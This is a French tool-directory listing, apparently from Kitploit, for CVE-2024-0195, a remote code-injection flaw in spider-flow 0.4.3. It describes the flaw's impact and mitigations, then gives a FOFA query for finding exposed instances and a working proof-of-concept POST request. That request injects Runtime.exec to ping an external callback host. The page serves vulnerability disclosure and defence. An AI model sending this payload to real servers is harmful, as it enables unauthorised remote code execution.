Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195 Contrôle inapproprié de la génération de code ('Code Injection') | Kitploit
Outils/GitHubGitHub/gh-ost00/cve-2024-0195-spiderflow
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubgh-ost00/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195 Contrôle inapproprié de la génération de code ('Code Injection')

Voir le dépôt
53il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-0195 Contrôle inapproprié de la génération de code ('Injection de code')

Résumé

CVE-2024-0195 est une vulnérabilité critique d'injection de code dans l'application web spider-flow 0.4.3, plus précisément dans la fonction FunctionService.saveFunction du fichier FunctionController.java. Un attaquant peut injecter à distance du code malveillant qui s'exécute sur le serveur. Cela permet une compromission complète de l'application.

Impact

Cette vulnérabilité est extrêmement grave car elle permet l'exécution de code à distance sur le serveur hébergeant l'application spider-flow vulnérable. Un attaquant pourrait compromettre entièrement le serveur, voler des données sensibles, installer des malwares ou des mineurs de crypto-monnaies, et l'utiliser pour d'autres attaques au sein du réseau. La confidentialité, l'intégrité et la disponibilité de l'application et du serveur sont toutes gravement impactées.

Correctif

Aucune version corrigée n'est explicitement mentionnée, donc le correctif ne semble actuellement pas être une option. La vulnérabilité a été divulguée publiquement et des exploits sont disponibles, une atténuation immédiate est donc cruciale.

Atténuation

Jusqu'à ce qu'un correctif officiel soit publié, spider-flow 0.4.3 doit être immédiatement mis hors ligne ou son accès limité aux réseaux/utilisateurs de confiance. Des pare-feu applicatifs Web ou d'autres contrôles de validation des entrées pourraient potentiellement être configurés pour détecter et bloquer les tentatives d'injection de code en guise d'atténuation provisoire. Cependant, ce ne sont pas des solutions complètes et la version vulnérable doit être mise à niveau dès qu'une version corrigée est disponible.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploitation

FOFA : app="spiderflow"

✔ Preuve de concept

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Télécharger l’outil